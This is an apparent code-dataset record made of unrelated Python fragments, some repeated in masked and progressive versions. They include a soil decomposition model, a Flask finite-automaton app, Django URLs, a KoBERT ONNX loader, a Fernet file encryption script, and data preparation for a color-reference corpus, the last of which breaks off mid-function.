: int\n current simulation day (index)\n\n \"\"\"\n # temperature and water factors for decomposition\n tempact = self.soil_temp_factor(project_day)\n wtfac = self.wb.calculate_soil_water_fac(topsoil=True)\n\n # decay rate of surface structural pool\n self.params.decayrate[0] = (self.params.kdec1 *\n math.exp(-3. * self.params.ligshoot) *\n tempact * wtfac)\n\n # decay rate of surface metabolic pool\n self.params.decayrate[1] = self.params.kdec2 * tempact * wtfac\n\n\n # decay rate of soil structural pool\n self.params.decayrate[2] = (self.params.kdec3 *\n math.exp(-3. 
* self.params.ligroot) *\n tempact * wtfac)\n\n # decay rate of soil metabolic pool\n self.params.decayrate[3] = self.params.kdec4 * tempact * wtfac\n\n\n # decay rate of active pool\n self.params.decayrate[4] = (self.params.kdec5 *\n (1.0 - 0.75 * self.params.finesoil) *\n tempact * wtfac)\n\n # decay rate of slow pool\n self.params.decayrate[5] = self.params.kdec6 * tempact * wtfac\n\n # decay rate of passive pool\n self.params.decayrate[6] = self.params.kdec7 * tempact * wtfac\n\n def soil_temp_factor(self, project_day):\n \"\"\"Soil-temperature activity factor (A9).\n\n Parameters:\n -----------\n project_day : int\n current simulation day (index)\n\n Returns:\n --------\n tfac : float\n soil temperature factor [degC]\n\n \"\"\"\n tsoil = self.met_data['tsoil'][project_day]\n\n if float_gt(tsoil, 0.0):\n tfac = (0.0326 + 0.00351 * tsoil**1.652 - (tsoil / 41.748)**7.19)\n if float_lt(tfac, 0.0):\n tfac = 0.0\n else:\n # negative number cannot be raised to a fractional power\n # number would need to be complex\n tfac = 0.0\n\n return tfac\n",
"step-ids": [
2,
5,
6,
7,
8
]
}
|
[
2,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
def finite_automate(word: str) ->str:
"""Реализация конечного автомата для проверки символьных строк"""
state: str = INITIAL_STATE
for ind, char in enumerate(word):
yield f'{word[ind:]} --> {state}'
state = RULE.get((state, char))
if not state:
break
if state in FINAL_STATE:
yield 'Цепочка принадлежит языку'
else:
yield 'Цепочка не принадлежит языку'
@app.route('/', methods=['GET', 'POST'])
def index():
res = None
if request.method == 'POST':
res = finite_automate(request.form['word'])
return render_template('index.html', res=res)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
RULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',
'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}
INITIAL_STATE: str = 'H'
FINAL_STATE: Set[str] = {'S', 'SE'}
def finite_automate(word: str) ->str:
"""Реализация конечного автомата для проверки символьных строк"""
state: str = INITIAL_STATE
for ind, char in enumerate(word):
yield f'{word[ind:]} --> {state}'
state = RULE.get((state, char))
if not state:
break
if state in FINAL_STATE:
yield 'Цепочка принадлежит языку'
else:
yield 'Цепочка не принадлежит языку'
@app.route('/', methods=['GET', 'POST'])
def index():
res = None
if request.method == 'POST':
res = finite_automate(request.form['word'])
return render_template('index.html', res=res)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app = Flask(__name__)
app.config['SECRET_KEY'] = 'top_secret'
RULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',
'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}
INITIAL_STATE: str = 'H'
FINAL_STATE: Set[str] = {'S', 'SE'}
def finite_automate(word: str) ->str:
"""Реализация конечного автомата для проверки символьных строк"""
state: str = INITIAL_STATE
for ind, char in enumerate(word):
yield f'{word[ind:]} --> {state}'
state = RULE.get((state, char))
if not state:
break
if state in FINAL_STATE:
yield 'Цепочка принадлежит языку'
else:
yield 'Цепочка не принадлежит языку'
@app.route('/', methods=['GET', 'POST'])
def index():
res = None
if request.method == 'POST':
res = finite_automate(request.form['word'])
return render_template('index.html', res=res)
<|reserved_special_token_1|>
from typing import Set, Dict, Tuple
from flask import Flask, render_template, request
app = Flask(__name__)
app.config['SECRET_KEY'] = 'top_secret'
RULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',
'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}
INITIAL_STATE: str = 'H'
FINAL_STATE: Set[str] = {'S', 'SE'}
def finite_automate(word: str) ->str:
"""Реализация конечного автомата для проверки символьных строк"""
state: str = INITIAL_STATE
for ind, char in enumerate(word):
yield f'{word[ind:]} --> {state}'
state = RULE.get((state, char))
if not state:
break
if state in FINAL_STATE:
yield 'Цепочка принадлежит языку'
else:
yield 'Цепочка не принадлежит языку'
@app.route('/', methods=['GET', 'POST'])
def index():
res = None
if request.method == 'POST':
res = finite_automate(request.form['word'])
return render_template('index.html', res=res)
<|reserved_special_token_1|>
from typing import Set, Dict, Tuple
from flask import Flask, render_template, request
app = Flask(__name__)
app.config['SECRET_KEY'] = 'top_secret'
# Определение константных величин
RULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S',
('H', 'b'): 'SE',
('S', 'b'): 'SE',
('SE', 'a'): 'SE',
('SE', 'b'): 'SE'}
INITIAL_STATE: str = 'H'
FINAL_STATE: Set[str] = {'S', 'SE'}
def finite_automate(word: str) -> str:
"""Реализация конечного автомата для проверки символьных строк"""
state: str = INITIAL_STATE
for ind, char in enumerate(word):
yield f'{word[ind:]} --> {state}'
state = RULE.get((state, char))
if not state:
break
if state in FINAL_STATE:
yield 'Цепочка принадлежит языку'
else:
yield 'Цепочка не принадлежит языку'
@app.route('/', methods=['GET', 'POST'])
def index():
res = None
if request.method == 'POST':
res = finite_automate(request.form['word'])
return render_template('index.html', res=res)
|
flexible
|
{
"blob_id": "86ea1c46383b5a8790eb187163107f4100395ef3",
"index": 8962,
"step-1": "<mask token>\n\n\ndef finite_automate(word: str) ->str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n",
"step-2": "<mask token>\nRULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',\n 'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}\nINITIAL_STATE: str = 'H'\nFINAL_STATE: Set[str] = {'S', 'SE'}\n\n\ndef finite_automate(word: str) ->str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n",
"step-3": "<mask token>\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'top_secret'\nRULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',\n 'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}\nINITIAL_STATE: str = 'H'\nFINAL_STATE: Set[str] = {'S', 'SE'}\n\n\ndef finite_automate(word: str) ->str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n",
"step-4": "from typing import Set, Dict, Tuple\nfrom flask import Flask, render_template, request\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'top_secret'\nRULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',\n 'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}\nINITIAL_STATE: str = 'H'\nFINAL_STATE: Set[str] = {'S', 'SE'}\n\n\ndef finite_automate(word: str) ->str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n",
"step-5": "from typing import Set, Dict, Tuple\nfrom flask import Flask, render_template, request\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'top_secret'\n\n# Определение константных величин\nRULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S',\n ('H', 'b'): 'SE',\n ('S', 'b'): 'SE',\n ('SE', 'a'): 'SE',\n ('SE', 'b'): 'SE'}\nINITIAL_STATE: str = 'H'\nFINAL_STATE: Set[str] = {'S', 'SE'}\n\n\ndef finite_automate(word: str) -> str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from django.urls import path
from django.views.decorators.csrf import csrf_exempt
from .views import TestView, index, setup_fraud_detection, verify_testing_works
urlpatterns = [
path('test/<str:name>/', index, name='index'),
path('ml/setup/', setup_fraud_detection, name='fraud_detection_setup'),
path('ml/verify/', verify_testing_works, name='fraud_verification'),
path('class/<str:name>/', csrf_exempt(TestView.as_view()), name='test_class'),
# path('mine/', MyView.as_view(), name='my-view'),
]
|
normal
|
{
"blob_id": "263347d1d445643f9c84e36a8cbb5304581ebaf6",
"index": 3888,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('test/<str:name>/', index, name='index'), path(\n 'ml/setup/', setup_fraud_detection, name='fraud_detection_setup'), path\n ('ml/verify/', verify_testing_works, name='fraud_verification'), path(\n 'class/<str:name>/', csrf_exempt(TestView.as_view()), name='test_class')]\n",
"step-3": "from django.urls import path\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .views import TestView, index, setup_fraud_detection, verify_testing_works\nurlpatterns = [path('test/<str:name>/', index, name='index'), path(\n 'ml/setup/', setup_fraud_detection, name='fraud_detection_setup'), path\n ('ml/verify/', verify_testing_works, name='fraud_verification'), path(\n 'class/<str:name>/', csrf_exempt(TestView.as_view()), name='test_class')]\n",
"step-4": "from django.urls import path\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .views import TestView, index, setup_fraud_detection, verify_testing_works\n\nurlpatterns = [\n path('test/<str:name>/', index, name='index'),\n path('ml/setup/', setup_fraud_detection, name='fraud_detection_setup'),\n path('ml/verify/', verify_testing_works, name='fraud_verification'),\n path('class/<str:name>/', csrf_exempt(TestView.as_view()), name='test_class'),\n # path('mine/', MyView.as_view(), name='my-view'),\n]",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# coding=utf-8
# Copyright 2019 SK T-Brain Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from kobert import download
def get_onnx_kobert_model(cachedir=".cache"):
"""Get KoBERT ONNX file path after downloading"""
onnx_kobert = {
"url": "s3://skt-lsl-nlp-model/KoBERT/models/kobert.onnx1.8.0.onnx",
"chksum": "6f6610f2e3b61da6de8dbce",
}
model_info = onnx_kobert
model_path, is_cached = download(
model_info["url"], model_info["chksum"], cachedir=cachedir
)
return model_path
def make_dummy_input(max_seq_len):
def do_pad(x, max_seq_len, pad_id):
return [_x + [pad_id] * (max_seq_len - len(_x)) for _x in x]
input_ids = do_pad([[31, 51, 99], [15, 5]], max_seq_len, pad_id=1)
token_type_ids = do_pad([[0, 0, 0], [0, 0]], max_seq_len, pad_id=0)
input_mask = do_pad([[1, 1, 1], [1, 1]], max_seq_len, pad_id=0)
position_ids = list(range(max_seq_len))
return (input_ids, token_type_ids, input_mask, position_ids)
if __name__ == "__main__":
import onnxruntime
import numpy as np
from kobert import get_onnx_kobert_model
onnx_path = get_onnx_kobert_model()
dummy_input = make_dummy_input(max_seq_len=512)
so = onnxruntime.SessionOptions()
sess = onnxruntime.InferenceSession(onnx_path)
outputs = sess.run(
None,
{
"input_ids": np.array(dummy_input[0]),
"token_type_ids": np.array(dummy_input[1]),
"input_mask": np.array(dummy_input[2]),
"position_ids": np.array(dummy_input[3]),
},
)
print(outputs[-2][0])
|
normal
|
{
"blob_id": "b6e4214ace89165f6cfde9f2b97fcee8be81f2ed",
"index": 4301,
"step-1": "<mask token>\n\n\ndef get_onnx_kobert_model(cachedir='.cache'):\n \"\"\"Get KoBERT ONNX file path after downloading\"\"\"\n onnx_kobert = {'url':\n 's3://skt-lsl-nlp-model/KoBERT/models/kobert.onnx1.8.0.onnx',\n 'chksum': '6f6610f2e3b61da6de8dbce'}\n model_info = onnx_kobert\n model_path, is_cached = download(model_info['url'], model_info['chksum'\n ], cachedir=cachedir)\n return model_path\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_onnx_kobert_model(cachedir='.cache'):\n \"\"\"Get KoBERT ONNX file path after downloading\"\"\"\n onnx_kobert = {'url':\n 's3://skt-lsl-nlp-model/KoBERT/models/kobert.onnx1.8.0.onnx',\n 'chksum': '6f6610f2e3b61da6de8dbce'}\n model_info = onnx_kobert\n model_path, is_cached = download(model_info['url'], model_info['chksum'\n ], cachedir=cachedir)\n return model_path\n\n\ndef make_dummy_input(max_seq_len):\n\n def do_pad(x, max_seq_len, pad_id):\n return [(_x + [pad_id] * (max_seq_len - len(_x))) for _x in x]\n input_ids = do_pad([[31, 51, 99], [15, 5]], max_seq_len, pad_id=1)\n token_type_ids = do_pad([[0, 0, 0], [0, 0]], max_seq_len, pad_id=0)\n input_mask = do_pad([[1, 1, 1], [1, 1]], max_seq_len, pad_id=0)\n position_ids = list(range(max_seq_len))\n return input_ids, token_type_ids, input_mask, position_ids\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_onnx_kobert_model(cachedir='.cache'):\n \"\"\"Get KoBERT ONNX file path after downloading\"\"\"\n onnx_kobert = {'url':\n 's3://skt-lsl-nlp-model/KoBERT/models/kobert.onnx1.8.0.onnx',\n 'chksum': '6f6610f2e3b61da6de8dbce'}\n model_info = onnx_kobert\n model_path, is_cached = download(model_info['url'], model_info['chksum'\n ], cachedir=cachedir)\n return model_path\n\n\ndef make_dummy_input(max_seq_len):\n\n def do_pad(x, max_seq_len, pad_id):\n return [(_x + [pad_id] * (max_seq_len - len(_x))) for _x in x]\n input_ids = do_pad([[31, 51, 99], [15, 5]], max_seq_len, pad_id=1)\n token_type_ids = do_pad([[0, 0, 0], [0, 0]], max_seq_len, pad_id=0)\n input_mask = do_pad([[1, 1, 1], [1, 1]], max_seq_len, pad_id=0)\n position_ids = list(range(max_seq_len))\n return input_ids, token_type_ids, input_mask, position_ids\n\n\nif __name__ == '__main__':\n import onnxruntime\n import numpy as np\n from kobert import get_onnx_kobert_model\n onnx_path = get_onnx_kobert_model()\n dummy_input = make_dummy_input(max_seq_len=512)\n so = onnxruntime.SessionOptions()\n sess = onnxruntime.InferenceSession(onnx_path)\n outputs = sess.run(None, {'input_ids': np.array(dummy_input[0]),\n 'token_type_ids': np.array(dummy_input[1]), 'input_mask': np.array(\n dummy_input[2]), 'position_ids': np.array(dummy_input[3])})\n print(outputs[-2][0])\n",
"step-4": "from kobert import download\n\n\ndef get_onnx_kobert_model(cachedir='.cache'):\n \"\"\"Get KoBERT ONNX file path after downloading\"\"\"\n onnx_kobert = {'url':\n 's3://skt-lsl-nlp-model/KoBERT/models/kobert.onnx1.8.0.onnx',\n 'chksum': '6f6610f2e3b61da6de8dbce'}\n model_info = onnx_kobert\n model_path, is_cached = download(model_info['url'], model_info['chksum'\n ], cachedir=cachedir)\n return model_path\n\n\ndef make_dummy_input(max_seq_len):\n\n def do_pad(x, max_seq_len, pad_id):\n return [(_x + [pad_id] * (max_seq_len - len(_x))) for _x in x]\n input_ids = do_pad([[31, 51, 99], [15, 5]], max_seq_len, pad_id=1)\n token_type_ids = do_pad([[0, 0, 0], [0, 0]], max_seq_len, pad_id=0)\n input_mask = do_pad([[1, 1, 1], [1, 1]], max_seq_len, pad_id=0)\n position_ids = list(range(max_seq_len))\n return input_ids, token_type_ids, input_mask, position_ids\n\n\nif __name__ == '__main__':\n import onnxruntime\n import numpy as np\n from kobert import get_onnx_kobert_model\n onnx_path = get_onnx_kobert_model()\n dummy_input = make_dummy_input(max_seq_len=512)\n so = onnxruntime.SessionOptions()\n sess = onnxruntime.InferenceSession(onnx_path)\n outputs = sess.run(None, {'input_ids': np.array(dummy_input[0]),\n 'token_type_ids': np.array(dummy_input[1]), 'input_mask': np.array(\n dummy_input[2]), 'position_ids': np.array(dummy_input[3])})\n print(outputs[-2][0])\n",
"step-5": "# coding=utf-8\n# Copyright 2019 SK T-Brain Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom kobert import download\n\n\ndef get_onnx_kobert_model(cachedir=\".cache\"):\n \"\"\"Get KoBERT ONNX file path after downloading\"\"\"\n onnx_kobert = {\n \"url\": \"s3://skt-lsl-nlp-model/KoBERT/models/kobert.onnx1.8.0.onnx\",\n \"chksum\": \"6f6610f2e3b61da6de8dbce\",\n }\n\n model_info = onnx_kobert\n model_path, is_cached = download(\n model_info[\"url\"], model_info[\"chksum\"], cachedir=cachedir\n )\n return model_path\n\n\ndef make_dummy_input(max_seq_len):\n def do_pad(x, max_seq_len, pad_id):\n return [_x + [pad_id] * (max_seq_len - len(_x)) for _x in x]\n\n input_ids = do_pad([[31, 51, 99], [15, 5]], max_seq_len, pad_id=1)\n token_type_ids = do_pad([[0, 0, 0], [0, 0]], max_seq_len, pad_id=0)\n input_mask = do_pad([[1, 1, 1], [1, 1]], max_seq_len, pad_id=0)\n position_ids = list(range(max_seq_len))\n return (input_ids, token_type_ids, input_mask, position_ids)\n\n\nif __name__ == \"__main__\":\n import onnxruntime\n import numpy as np\n from kobert import get_onnx_kobert_model\n\n onnx_path = get_onnx_kobert_model()\n dummy_input = make_dummy_input(max_seq_len=512)\n so = onnxruntime.SessionOptions()\n sess = onnxruntime.InferenceSession(onnx_path)\n outputs = sess.run(\n None,\n {\n \"input_ids\": np.array(dummy_input[0]),\n \"token_type_ids\": np.array(dummy_input[1]),\n \"input_mask\": np.array(dummy_input[2]),\n \"position_ids\": 
np.array(dummy_input[3]),\n },\n )\n print(outputs[-2][0])\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class VisitaSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Visita
fields = 'id', 'usuario', 'lugar', 'fecha_visita', 'hora_visita'
<|reserved_special_token_1|>
from rest_framework import serializers
from .models import *
class VisitaSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Visita
fields = 'id', 'usuario', 'lugar', 'fecha_visita', 'hora_visita'
<|reserved_special_token_1|>
from rest_framework import serializers
from .models import *
class VisitaSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Visita
fields = ('id', 'usuario', 'lugar', 'fecha_visita', 'hora_visita')
|
flexible
|
{
"blob_id": "72bbd100a37a86dec7684257f2bec85d7367c009",
"index": 5810,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass VisitaSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Visita\n fields = 'id', 'usuario', 'lugar', 'fecha_visita', 'hora_visita'\n",
"step-3": "from rest_framework import serializers\nfrom .models import *\n\n\nclass VisitaSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Visita\n fields = 'id', 'usuario', 'lugar', 'fecha_visita', 'hora_visita'\n",
"step-4": "from rest_framework import serializers\nfrom .models import *\n\n\nclass VisitaSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Visita\n fields = ('id', 'usuario', 'lugar', 'fecha_visita', 'hora_visita')",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from os import read
from cryptography.fernet import Fernet
#create a key
# key = Fernet.generate_key()
#When every we run this code we will create a new key
# with open('mykey.key','wb') as mykey:
# mykey.write(key)
#To avoid create a new key and reuse the same key
with open('mykey.key','rb') as mykey:
key = mykey.read()
#print(key)
# f = Fernet(key)
# with open('Mailing Client/password.txt','rb') as original_file:
# original = original_file.read()
# #encrypt the data
# encrypted = f.encrypt(original)
# with open('encryptedpassword.txt','wb') as encrypted_password_file:
# encrypted_file = encrypted_password_file.write(encrypted)
#Decrypt Part
f = Fernet(key)
with open('encryptedpassword.txt','rb') as encrypted_password_file:
encrypte_file = encrypted_password_file.read()
decrypt = f.decrypt(encrypte_file)
with open('decryptedpassword.txt','wb') as decrypted_password_file:
decrypted_file = decrypted_password_file.write(decrypt)
|
normal
|
{
"blob_id": "df828344b81a40b7101adcc6759780ea84f2c6b4",
"index": 4698,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('mykey.key', 'rb') as mykey:\n key = mykey.read()\n<mask token>\nwith open('encryptedpassword.txt', 'rb') as encrypted_password_file:\n encrypte_file = encrypted_password_file.read()\n<mask token>\nwith open('decryptedpassword.txt', 'wb') as decrypted_password_file:\n decrypted_file = decrypted_password_file.write(decrypt)\n",
"step-3": "<mask token>\nwith open('mykey.key', 'rb') as mykey:\n key = mykey.read()\nf = Fernet(key)\nwith open('encryptedpassword.txt', 'rb') as encrypted_password_file:\n encrypte_file = encrypted_password_file.read()\ndecrypt = f.decrypt(encrypte_file)\nwith open('decryptedpassword.txt', 'wb') as decrypted_password_file:\n decrypted_file = decrypted_password_file.write(decrypt)\n",
"step-4": "from os import read\nfrom cryptography.fernet import Fernet\nwith open('mykey.key', 'rb') as mykey:\n key = mykey.read()\nf = Fernet(key)\nwith open('encryptedpassword.txt', 'rb') as encrypted_password_file:\n encrypte_file = encrypted_password_file.read()\ndecrypt = f.decrypt(encrypte_file)\nwith open('decryptedpassword.txt', 'wb') as decrypted_password_file:\n decrypted_file = decrypted_password_file.write(decrypt)\n",
"step-5": "from os import read\r\nfrom cryptography.fernet import Fernet\r\n #create a key\r\n# key = Fernet.generate_key()\r\n\r\n#When every we run this code we will create a new key \r\n# with open('mykey.key','wb') as mykey:\r\n# mykey.write(key)\r\n\r\n#To avoid create a new key and reuse the same key\r\n\r\nwith open('mykey.key','rb') as mykey:\r\n key = mykey.read()\r\n\r\n#print(key)\r\n\r\n# f = Fernet(key)\r\n\r\n# with open('Mailing Client/password.txt','rb') as original_file:\r\n# original = original_file.read()\r\n\r\n# #encrypt the data\r\n\r\n# encrypted = f.encrypt(original)\r\n\r\n# with open('encryptedpassword.txt','wb') as encrypted_password_file:\r\n# encrypted_file = encrypted_password_file.write(encrypted)\r\n\r\n#Decrypt Part\r\n\r\nf = Fernet(key)\r\n\r\nwith open('encryptedpassword.txt','rb') as encrypted_password_file:\r\n encrypte_file = encrypted_password_file.read()\r\n\r\ndecrypt = f.decrypt(encrypte_file)\r\n\r\nwith open('decryptedpassword.txt','wb') as decrypted_password_file:\r\n decrypted_file = decrypted_password_file.write(decrypt)\r\n\r\n\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def get_data():
df = pd.read_csv('./data/filteredCorpus.csv')
df_filt = df[df['outcome'] == True]
df_filt = df_filt[df_filt['role'] == 'speaker']
df_filt = df_filt[df_filt['source'] == 'human']
utt = df_filt['contents']
utt_filt = [u.lower() for u in utt if len(u.split()) == 1]
utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for
u in utt_filt]
utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(
str.maketrans('', '', string.punctuation)))
df_final = df.loc[df['contents'].isin(utt_final)]
le = LabelEncoder()
df_final['contents'] = le.fit_transform(df_final['contents'])
return df_final, le
def get_meaning_matrix(df):
df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))
df['colors'] = df['colors'].apply(lambda x: str(x))
colors_le = LabelEncoder()
df['colors'] = colors_le.fit_transform(df['colors'])
print('length colors and contents', len(df['colors']), len(df['contents']))
print('set colors and contents', len(set(df['colors'])), len(set(df[
'contents'])))
meaning_mat = pd.crosstab(df['colors'], df['contents'])
meaning_mat = np.array(meaning_mat)
for i in range(len(meaning_mat[:, 0])):
if sum(meaning_mat[i, :]) == 0:
print('meaning mat is 0 for this row: ', i)
for j in range(len(meaning_mat[0, :])):
if meaning_mat[i, j] == 0:
print('meaning mat is 0 at: ', i, j, ' !!!')
return meaning_mat, colors_le
<|reserved_special_token_0|>
def get_literal_listener_training_data(df):
output = []
all_utt = df['contents']
idx_to_desc = {i: u for i, u in enumerate(all_utt)}
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents']).to(device)
correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],
dtype=torch.float32)
alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],
dtype=torch.float32)
alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],
dtype=torch.float32)
colors = correct, alt1, alt2
idxs = np.arange(3)
np.random.shuffle(idxs)
colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],
colors[idxs[2]]]).to(device)
correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)
output.append((correct_idx, colors_shuff, utt))
return output
def get_literal_speaker_training_data(df):
output = []
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents'], dtype=torch.long).to(device)
color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],
dtype=torch.float32).to(device)
output.append([color, utt])
return output
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_data():
    """Load the filtered color-reference corpus and label-encode utterances.

    Reads ./data/filteredCorpus.csv, keeps successful human speaker turns,
    restricts to single-word utterances (lowercased, punctuation stripped)
    that occur more than once, and integer-encodes the surviving utterances.

    Returns:
        (df_final, le): the selected rows and the fitted LabelEncoder, so
        callers can map encoded labels back to utterance strings.
    """
    df = pd.read_csv('./data/filteredCorpus.csv')
    # Keep only successful games, speaker turns, and human-generated text.
    df_filt = df[df['outcome'] == True]
    df_filt = df_filt[df_filt['role'] == 'speaker']
    df_filt = df_filt[df_filt['source'] == 'human']
    utt = df_filt['contents']
    # Single-word utterances only, normalized (lowercase, no punctuation).
    utt_filt = [u.lower() for u in utt if len(u.split()) == 1]
    utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for
        u in utt_filt]
    # Subtracting one count per distinct utterance keeps only those that
    # appear more than once.
    utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())
    df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())
    df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(
        str.maketrans('', '', string.punctuation)))
    # NOTE(review): rows are selected from the *unfiltered* df, whose
    # 'contents' were never lowercased/de-punctuated -- presumably df_filt
    # was intended here; confirm against callers before changing behavior.
    # .copy() materializes the selection so the assignment below mutates a
    # real frame instead of a view (avoids SettingWithCopyWarning).
    df_final = df.loc[df['contents'].isin(utt_final)].copy()
    le = LabelEncoder()
    df_final['contents'] = le.fit_transform(df_final['contents'])
    return df_final, le
def get_meaning_matrix(df):
    """Build a color x utterance co-occurrence ("meaning") matrix.

    Mutates *df* in place: adds a label-encoded 'colors' column built from
    the stringified (H, S, L) click-color triple.

    Returns:
        (meaning_mat, colors_le): the num_colors x num_utterances count
        matrix and the fitted LabelEncoder for the color labels.
    """
    hsl_triples = zip(df['clickColH'], df['clickColS'], df['clickColL'])
    df['colors'] = [str(triple) for triple in hsl_triples]
    colors_le = LabelEncoder()
    df['colors'] = colors_le.fit_transform(df['colors'])
    print('length colors and contents', len(df['colors']), len(df['contents']))
    print('set colors and contents', len(set(df['colors'])), len(set(df[
        'contents'])))
